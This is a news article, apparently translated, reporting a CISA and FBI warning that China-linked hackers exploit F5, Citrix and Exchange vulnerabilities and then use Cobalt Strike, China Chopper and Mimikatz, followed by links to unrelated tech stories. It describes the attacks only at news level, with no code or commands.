Thursday, January 21, 17:48
Home security China: Funds hackers for attacks in the US using Exchange, Citrix, F5 ...

China: Funds hackers for attacks in the US by exploiting Exchange, Citrix, F5 bugs!

The US government warns of Chinese-funded hackers to carry out attacks in government services, taking advantage of bugs in Microsoft Exchange, Citrix and F5 devices and servers.

More specifically, the CISA and FBI warn that hackers linked to China's Ministry of State Security (MMS) attack US government agencies and private companies, exploiting bugs in publicly exposed systems.

China vs USA

According to a recent indictment by the US Department of Justice, hackers linked to the MSS have targeted various industries in both the US and other countries. Among the industries that have been found in their sights are high-tech manufacturers, manufacturers of medical devices, civil services, educational institutions, pharmaceutical companies as well as the defense of target countries. These are attacks carried out in the context of a campaign which lasted more than ten years. These Chinese-funded hackers acted both for their own benefit and for the benefit of the Chinese MSS.

In their attacks, hackers linked to China search for vulnerable and publicly exposed devices using the search engine Shodan and vulnerability databases, such as CVE (Common Vulnerabilities and Exposure) and NVD (National Vulnerabilities Database).

hackers China-Exchange Citrix F5 bugs

In accordance with BleepingComputer, CISA has noticed that hackers target bugs in F5, Citrix and Microsoft Exchange Server to obtain access in an organization's network and collect data. According to CISA, the most notable Exchange, Citrix and F5 bugs that have been targeted by hackers are the following:

  • CVE-2020-5902: Bug on Big-IP F5 - This bug allows a remote intruder to access the TMUI (Traffic Management User Interface) of the BIG-IP application delivery controller (ADC) without authentication, as well as to proceed with remote execution code.
  • CVE-2019-19781: Citrix VPN Appliances Bugs on the Citrix Application Delivery Controller (ADC), Citrix Gateway, and Citrix SD-WAN WANOP allow unauthorized intruders to execute remote commands to gain access to a network.
  • CVE-2020-0688: Microsoft Exchange Server - This bug is present in the Exchange Control Panel (ECP) component and is caused by Exchange failing to generate unique cryptographic keys during installation. Once exploited, intruders can execute remote code execution (RCE) on server with system privileges.
Exchange Citrix F5 bugs

In addition, once a network is compromised, Chinese-funded hackers download a set of tools that allow them to gain further access to computers on the compromised network. According to CISA, hackers usually download specific tools to enhance their attacks. Some of them are the following:

Cobalt Strike: Cobalt Strike is a legitimate opponent simulation platform intended for use by professionals security, to evaluate the security of a network. Hackers use crafted URIs as part of their attacks to backdoor access to compromised systems and to develop additional tools on the target network.

China Chopper Web Shell: This tool allows hackers to install PHP, ASP, ASPX, JSP and CFM webshells (backdoor) on publicly exposed web servers. Once the China Chopper Web Shell is installed, hackers gain full access to a remote server through the exposed site.

Mimikatz: Mimikatz is a tool that allows hackers to steal Windows credentials stored in the memory of a computer. This tool is commonly used by hackers, along with features ransomware, to gain access to admin credentials and violate their domain controllers Windows.

Using the above three tools, hackers can spread from a compromised system to other devices, until they gain full control of the targeted network. In addition, CISA warns that hackers are exploiting the Microsoft Exchange CVE-2020-0688 RCE bug to collect emails from exchange servers located in Federal Government environments.

CISA-FBI proposals

Therefore, the CISA and the FBI recommend that agencies monitor their infrastructure on a daily basis and update their management plans. They are also advised to regularly check configuration programs to ensure that they can monitor and mitigate emerging threats. Thus, they will prevent possible "operations" of sophisticated cyber threat agents and will protect their resources and information.


Please enter your comment!
Please enter your name here

Every accomplishment starts with the decision to try.



Bill Gates: Will he work with Biden on COVID-19 / climate change?

Microsoft co-founder Bill Gates said on Twitter that he is looking forward to working with the new US President, Joe Biden, and ...

What are the rumors circulating about the iPhone 13?

Apple iPhone 13 will have a redesigned Face ID system that will have a smaller notch at the top of the screen, ...

Biden: How was the political transition in the US captured on social media?

As Joe Biden was sworn in as President of the United States, this important political transition was captured on popular social media. On January 20, ...

CentOS ceases to be supported but RHEL is offered for free

Last month, Red Hat caused a great deal of concern in the Linux world when it announced the discontinuation of CentOS Linux.

Microsoft Office 365 employee passwords leaked online!

A new large-scale phishing campaign targeting global organizations has been found to bypass Microsoft Office 365 Advanced Threat Protection (ATP) and ...

COSMOTE and Microsoft provide new cloud solutions for businesses

COSMOTE and Microsoft expand their cooperation, offering even more advanced and high quality cloud solutions, in large and small ...

Cyber ​​attacks in Eastern Europe are on the rise!

The cyber-attacks that have taken place in many US government agencies and companies in recent months have caused concern in the developing countries of ...

Tesla reduces the prices of the Model 3 in Europe

Tesla has reduced the prices of the Model 3 in many European markets, which reductions could be partly linked ...

iOS, Android, XBox users in the crosshairs of a new malvertising campaign

Recently a new malvertising campaign was discovered that targets users of mobile and other connected devices and uses effective ...

Microsoft: "Zero trust" protects against sophisticated hacking attacks

According to Microsoft, the techniques used by the hackers of SolarWinds, were sophisticated but common and preventable. To avoid future attacks ...